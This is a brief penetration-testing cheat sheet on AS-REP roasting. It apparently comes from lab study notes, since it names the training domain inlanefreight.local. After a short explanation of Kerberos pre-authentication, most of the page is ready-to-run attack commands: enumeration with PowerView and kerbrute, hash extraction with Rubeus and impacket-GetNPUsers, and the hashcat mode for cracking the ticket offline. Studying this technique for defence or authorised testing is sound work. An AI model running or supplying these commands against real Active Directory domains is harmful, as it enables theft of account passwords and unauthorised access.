asreproasting-abuse

It is possible to obtain the Ticket Granting Ticket for any account that has the "Do not require kerberos pre-authentication" settings enabled. The authentication service reply is encrypted with the account's password and any domain user can request it.

With pre-authentication, a user enters their password, which encrypts a time stamp. The Domain Controller will decrypt this to validate that the correct password was used. If successful, a TGT will be issued to the user for further authentication requests in the domain. If an account has pre-authentication disabled, an attacker can request authentication data for the affected account and retrieve an encrypted TGT from the Domain Controller. This can be subjected to an offline password attack using a tool such as Hashcat or John the Ripper. This attack is similar to Kerberoasting.

Enumerate accounts that do not require DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired /nowrap | select samaccountname,userprincipalname,useraccountcontrol | fl

Enumerate AS-REP in proper format using RUBEUS

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Enumerate AS-REP using KERBRUTE (user account that do not require pre-auth)

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

Hunting for users with kerberoast pre-auth not required (linux)

impacket-GetNPUsers INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

Crack using hashcat

-m 18200